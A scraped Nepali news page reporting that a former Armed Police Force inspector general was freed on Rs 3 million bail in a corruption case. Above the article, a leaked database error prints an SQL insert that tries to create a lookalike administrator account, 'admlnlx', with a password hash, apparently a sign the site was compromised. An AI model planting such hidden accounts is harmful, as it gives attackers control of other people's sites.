WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BaL.aLoD.RyrNx01UjvPoxHS2B4aY0/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 09:48:49', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सशस्त्रका पूर्वआईजीपी ३० लाखमा छुटे – Gaule Khabar

सशस्त्रका पूर्वआईजीपी ३० लाखमा छुटे

सशस्त्रका पूर्वआईजीपी ३० लाखमा छुटे

काठमाडौं, पुस  १२ –

आफूले गैरकानुनी रुपमा लाभ लिई सरकारलाई हानी पुर्‍याएको आरोपको मुद्दामा माग गरेबमोजिमको ३० लाख रुपैयाँ धरौटी राखेर सशस्त्र प्रहरी बलका पूर्वमहानिरीक्षक वासुदेव ओली सोमबार थुनामुक्त भएका छन् ।

विशेष अदालतका सदस्यहरु भूपेन्द्रप्रसाद राई, नरेन्द्रकुमार शिवाकोटी र प्रभा बस्नेतको इजलासले ओलीसँग तीस लाख रुपैयाँ नगद वा जेथा लिई थुनामुक्त गर्न र नदिएमा थुनामा पठाउन उल्लेख गरिएको थियो ।

पूर्वमहानिरीक्षक ओलीबाट १ करोड १४ लाख ५४ हजार ४९ रुपैयाँ ५० पैसा भ्रष्टाचार भएको अख्तियारले दाबी गरेको छ । नेपाल समाचारपत्र दैनिकमा खबर छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका